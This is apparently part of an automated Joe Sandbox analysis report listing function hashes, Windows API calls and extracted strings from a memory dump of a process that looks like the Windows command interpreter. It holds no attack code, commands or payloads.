                                              • API String ID: 2240656346-0
                                              • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction ID: ffb029548c0d648dca5e797d9d3cdd78ca19362eb8a50b9959d5b0e6d4a9d468
                                              • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction Fuzzy Hash: 16318233628A8182E7508F15E4406B9B7A4FB8D7A4F544134EA4E83774DF3ED4498B45
                                              APIs
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D0F9
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D10F
                                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D166
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D17A
                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D18C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                              • String ID:
                                              • API String ID: 3008996577-0
                                              • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction ID: d007d86092f68e37f942bcc0a1fec625e1ecc602c61e8193303210e364682e15
                                              • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction Fuzzy Hash: 9F214B27B14A51CAE7009BB1E4002FD77B0FB4DB68B445125EE0D93B68DF39E044CB19
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CreateSemaphore
                                              • String ID: _p0$wil
                                              • API String ID: 1078844751-1814513734
                                              • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction ID: 45008ca9652760eb1404079e97b845067e79f21fcac3388420307921d374a5ca
                                              • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction Fuzzy Hash: 15510663B197C286EE218F1584543F97290EF8CBA8FA44435DA0D977A5DF3EE405870A
                                              APIs
                                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6EB19B934
                                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9A5
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                              • String ID: %WINDOWS_COPYRIGHT%
                                              • API String ID: 1103618819-1745581171
                                              • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction ID: a3bab6ffc0421f305a708609079b617eca9dd6ace435842a03f167c34aa8f4f4
                                              • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction Fuzzy Hash: EF41A3A3A1878182EA108F1594103FA73A0FB5DBE8F455235DE9D833A5EF3EE485C705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$_wcslwr
                                              • String ID: [%s]
                                              • API String ID: 886762496-302437576
                                              • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction ID: 177afd252a68ab93ca058ca1520b9aa680b34ba191fc0ba5dba03387951796ac
                                              • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction Fuzzy Hash: 13316933B05B8286EB21CF21D8543E967A0FB8DB98F444035DA8D8B769DF3DE2498705
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswspace
                                              • String ID: off
                                              • API String ID: 2389812497-733764931
                                              • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                              • Instruction ID: 7ab27fa02a0a569c375a5b1fa0d5c8b9bd6035af35a7e28bd8d322e0b18dd8cc
                                              • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                              • Instruction Fuzzy Hash: 13215E23E0C65281FA605B15B6503F966A0FF4DBA8F5C8035ED0EC76A4DF2EE641970B
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                              • String ID: %s=%s$DPATH$PATH
                                              • API String ID: 3731854180-3148396303
                                              • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                              • Instruction ID: 62c53ce127e9afd0b0ffd137db37602279efe43236b8a6249fde57a5222adde8
                                              • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                              • Instruction Fuzzy Hash: CF21B323B0968680EA508F65E4403F523A0AF8CBE8F884035C90EC73B4DF2EE644874A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcscmp
                                              • String ID: *.*$????????.???
                                              • API String ID: 3392835482-3870530610
                                              • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                              • Instruction ID: 11c45e1f9167d73698d8d2b5c895d0055b5948f32683e921f66601718a5cae3d
                                              • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                              • Instruction Fuzzy Hash: 0B11E526B24A5281E7658F26B4402B9B3A1FB4CB94F185030CE8D87B69DF3EE441C709
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: fprintf
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 383729395-2781220306
                                              • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction ID: 5536a2873e0241de2371be545cf7da72d6289bd92f35caf4f2b0d95cb0b6a4fa
                                              • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction Fuzzy Hash: AF119133908682C1EA558B14E9402F96261FB4C7F8F445332D67D832F4EF2EE485874A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswspacewcschr
                                              • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                              • API String ID: 287713880-1183017076
                                              • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                              • Instruction ID: 802a0722d1b2a386ac4b76d3211fa66746a8b3d6fe1d77960468ac09a4bedeb3
                                              • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                              • Instruction Fuzzy Hash: DEF0A423A18657C1EA608B41B4043B66690FF4DF68B469135E94E82374DF2EE444C70A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                                              • API String ID: 1646373207-2530943252
                                              • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction ID: 3dea42dffc85d8f21959ad4a8c880efcb27f43622a36b88b9bad74bbe207ed66
                                              • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction Fuzzy Hash: 99010863E09B07C5EA448B11B8913F462A0EF4E738F540339D53E923F0DE2E7485870A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: RaiseFailFastException$kernelbase.dll
                                              • API String ID: 1646373207-919018592
                                              • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                              • Instruction ID: 4f8203e3fd4907c643268ab677503bf4f31a9eb7737a4495fba29a3bc8669933
                                              • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                              • Instruction Fuzzy Hash: 09F03022B1878192E6044F12F5442B9BA60FF8DBE4B449134DA4E83B24CF3DE449CB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$CurrentDirectorytowupper
                                              • String ID:
                                              • API String ID: 1403193329-0
                                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction ID: 28940a929975d41681973c16c69075499e64828228b21c54ffa0d37e7388adbe
                                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction Fuzzy Hash: 7C61CE33A18B928AEB20CB21E8403ED37A4FB89768F104134DE5D93BA9DF79E450C705
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp$wcschr
                                              • String ID:
                                              • API String ID: 3270668897-0
                                              • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction ID: 171141bf0dcb904ab1a4cbb9127d434c51bbc51e55c5ecca81bd9a9267663299
                                              • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction Fuzzy Hash: 5851A313E0C64281EB619F10E4403F8A3A1FF4DBA8F588131DA4EC76F9DE2EE545835A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveFullNamePathType
                                              • String ID:
                                              • API String ID: 3442494845-0
                                              • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction ID: 116b7926e7ae58be723d5bc75909094960bea220d9b84d6a86078f43e30d1c7a
                                              • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction Fuzzy Hash: C831AF33615BC18AEB60CF11E8443E973A4FB89B88F044035DA4D87B64CF39E245C700
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                              • String ID:
                                              • API String ID: 140117192-0
                                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction ID: fa79b173a9db915869f3fecc71684ef5ce07706224ceeb39ef2b6c669e847bd2
                                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction Fuzzy Hash: 7441B676A08F4195EB509B18F8903E573A4FB8C768F904036DA8D92774DF7EE548CB05
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcstol$lstrcmp
                                              • String ID:
                                              • API String ID: 3515581199-0
                                              APIs
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$TimeWrite
                                              • String ID:
                                              • API String ID: 4019809305-0
                                              APIs
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveNamePathTypeVolume
                                              • String ID:
                                              • API String ID: 1029679093-0
                                              APIs
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                              • String ID:
                                              • API String ID: 2448200120-0
                                              APIs
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              APIs
                                                • Part of subcall function 00007FF6EB183C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB183D0C
                                                • Part of subcall function 00007FF6EB183C24: towupper.MSVCRT ref: 00007FF6EB183D2F
                                                • Part of subcall function 00007FF6EB183C24: iswalpha.MSVCRT ref: 00007FF6EB183D4F
                                                • Part of subcall function 00007FF6EB183C24: towupper.MSVCRT ref: 00007FF6EB183D75
                                                • Part of subcall function 00007FF6EB183C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183DBF
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176ABF
                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176AD3
                                                • Part of subcall function 00007FF6EB176B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6EB176AE8,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B8B
                                                • Part of subcall function 00007FF6EB176B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6EB176AE8,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B97
                                                • Part of subcall function 00007FF6EB176B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF6EB176AE8,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176BAF
                                                • Part of subcall function 00007FF6EB176B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB176AF1,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B39
                                                • Part of subcall function 00007FF6EB176B30: RtlFreeHeap.NTDLL(?,?,?,00007FF6EB176AF1,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B4D
                                                • Part of subcall function 00007FF6EB176B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB176AF1,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B59
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176B03
